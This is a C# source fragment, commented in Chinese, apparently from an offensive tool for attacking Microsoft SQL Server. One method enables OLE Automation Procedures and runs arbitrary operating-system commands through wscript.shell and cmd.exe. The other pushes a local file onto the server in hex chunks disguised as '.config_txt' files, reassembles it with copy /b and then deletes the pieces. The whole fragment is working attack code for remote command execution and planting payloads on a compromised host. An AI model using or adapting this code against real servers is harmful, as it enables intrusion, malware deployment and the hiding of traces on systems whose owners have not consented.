/// <summary> /// sp_cmdshell 执行命令 /// </summary> /// <param name="Command">命令</param> public void sp_cmdshell(String Command) { if (setting.Check_configuration("Ole Automation Procedures", 0)) { if (setting.Enable_ola()) { return; } } var sqlstr = String.Format(@" declare @shell int,@exec int,@text int,@str varchar(8000); exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'exec',@exec output,'c:\windows\system32\cmd.exe /c {0}' exec sp_oamethod @exec, 'StdOut', @text out; exec sp_oamethod @text, 'ReadAll', @str out select @str", Command); Console.WriteLine(Batch.RemoteExec(Conn, sqlstr, true)); }
/// <summary> /// 文件上传,使用 OLE Automation Procedures 的 ADODB.Stream /// </summary> /// <param name="localFile">本地文件</param> /// <param name="RemoteFile">远程文件</param> public void UploadFiles(String localFile, String remoteFile) { Console.WriteLine(String.Format("[*] Uploading '{0}' to '{1}'...", localFile, remoteFile)); if (setting.Check_configuration("Ole Automation Procedures", 0)) { if (setting.Enable_ola()) { return; } } int count = 0; try { string hexString = string.Concat(File.ReadAllBytes(localFile).Select(b => b.ToString("X2"))); ArrayList arrlist = GetSeparateSubString(hexString, 150000); foreach (string hex150000 in arrlist) { count++; string filePath = String.Format("{0}_{1}.config_txt", remoteFile, count); sqlstr = String.Format(@" DECLARE @ObjectToken INT EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT EXEC sp_OASetProperty @ObjectToken, 'Type', 1 EXEC sp_OAMethod @ObjectToken, 'Open' EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x{0} EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL,'{1}', 2 EXEC sp_OAMethod @ObjectToken, 'Close' EXEC sp_OADestroy @ObjectToken", hex150000, filePath); Batch.RemoteExec(Conn, sqlstr, false); if (setting.File_Exists(filePath)) { Console.WriteLine("[+] {0}-{1} Upload completed", arrlist.Count, count); } else { Console.WriteLine("[!] {0}-{1} Error uploading", arrlist.Count, count); Conn.Close(); Environment.Exit(0); } Thread.Sleep(5000); } string shell = String.Format(@" DECLARE @SHELL INT EXEC sp_oacreate 'wscript.shell', @SHELL OUTPUT EXEC sp_oamethod @SHELL, 'run' , NULL, 'c:\windows\system32\cmd.exe /c "); sqlstr = "copy /b "; for (int i = 1; i < count + 1; i++) { if (i != count) { sqlstr += String.Format(@"{0}_{1}.config_txt+", remoteFile, i); } else { sqlstr += String.Format(@"{0}_{1}.config_txt {0}'", remoteFile, i); } } Console.WriteLine(@"[+] copy /b {0}_x.config_txt {0}", remoteFile); Batch.RemoteExec(Conn, shell + sqlstr, false); Thread.Sleep(5000); sqlstr = String.Format(@"del {0}*.config_txt'", remoteFile.Replace(Path.GetFileName(remoteFile), "")); Console.WriteLine("[+] {0}", sqlstr.Replace("'", "")); Batch.RemoteExec(Conn, shell + sqlstr, false); if (setting.File_Exists(remoteFile)) { Console.WriteLine("[*] '{0}' Upload completed", localFile); } } catch (Exception ex) { Conn.Close(); Console.WriteLine("[!] Error log: \r\n" + ex.Message); } }